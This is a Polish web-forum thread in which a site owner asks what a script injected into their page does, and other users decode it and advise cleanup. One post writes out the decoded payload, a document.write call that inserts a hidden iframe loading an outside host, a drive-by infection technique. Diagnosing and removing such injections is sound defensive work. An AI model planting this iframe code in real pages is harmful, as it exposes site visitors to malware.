![]() |
![]() ![]() |
![]() |
![]() ![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 56 Pomógł: 0 Dołączył: 15.09.2003 Ostrzeżenie: (0%) ![]() ![]() |
Witam,
mam prosbe, czy ktos moze podpowiedziec, co ponizszy skrypt robi? Gdyz ostatnio zauwazylem ze dodal sie do kodu strony i wyglada na jakis malware?
lub jakas podpowiedz jak to madrze sprawdzic? |
|
|
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 2 592 Pomógł: 445 Dołączył: 12.03.2007 Ostrzeżenie: (0%) ![]() ![]() |
Ten skrypcik generuje coś takiego:
Kod "window.status='Done';document.write('<iframe name=3f2c srúÒ££³Îξ³ççãËÖËëÏÏ¢ÏîÞF÷£Ó˺ϧËãÓF÷£Ó˺÷ËãÏÇÓÖÚºª²®²ÖÞî¾Í ɧÉ,ýý<mȸ9í-Í=ýl¨¨¸¸ü,|ímù-¼|-XM]íYxH)ݬmí]È)" a potem to wykonuje przez: eval(p); Jednak, przynajmniej w ff firebug wywala błąd, widać tu próbę przemycenia ukrytej ramki, ktoś tu hackuje (IMG:http://forum.php.pl/style_emoticons/default/blinksmiley.gif) |
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 1 Pomógł: 0 Dołączył: 20.08.2007 Ostrzeżenie: (0%) ![]() ![]() |
lepiej to usuń, zmień hasło do serwera i nie trzymaj go nigdzie zapisanego w systemie tylko co najwyżej na papierze. np. Google może ci zindeksować stronę jako zawirusowaną i ją blokować
|
|
|
![]()
Post
#4
|
|
Grupa: Zarejestrowani Postów: 175 Pomógł: 17 Dołączył: 23.06.2006 Ostrzeżenie: (0%) ![]() ![]() |
Kod skryptu został źle przekopiowany. Zadaniem tej ramki jest pobranie czegoś, co świadczy o tym sr... a potem dziwne znaki. A miał to być atrybut src.
Kod window.status='Done';document.write('<iframe name=3f2c src="http://8speed.info/t/?'+Math.round(Math.random()*26070)+'3f2c'+'" width=237 height=110 style="display:none"></iframe>') > Nie jest to poprawnie zdekodowane, w każdym razie wygląda to mniej więcej tak. Zastanawia mnie tylko ten fragment przed width, co tam mogło być. Już jest poprawione (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) kolega miał rację (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) z resztą wystarczyło się domyśleć (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Ten post edytował likemandrake 17.02.2009, 12:38:44 |
|
|
![]()
Post
#5
|
|
Grupa: Zarejestrowani Postów: 2 592 Pomógł: 445 Dołączył: 12.03.2007 Ostrzeżenie: (0%) ![]() ![]() |
Kod ASCII: Â! = HEX: C221 natomiast HEX: 22 = ASCII: " Te Â! to miał być cudzysłów kończący src="" i prawdopodobnie jakas spacja, ale chyba nie wyszło do końca (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) W każdym razie usuń, przejrzyj inne skrypty, wywal wszysko, zmień hasła i monitoruj co się dzieje dalej. Pozdrawiam |
|
|
![]()
Post
#6
|
|
Grupa: Zarejestrowani Postów: 175 Pomógł: 17 Dołączył: 23.06.2006 Ostrzeżenie: (0%) ![]() ![]() |
A najlepiej znajdź przyczynę, jak ten skrypt w ogóle został dolepiony do Twojej strony - nie koniecznie ktoś musiał posiadać hasło do Twojego konta hostingowego, czy co tam masz.
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 1.10.2025 - 09:06 |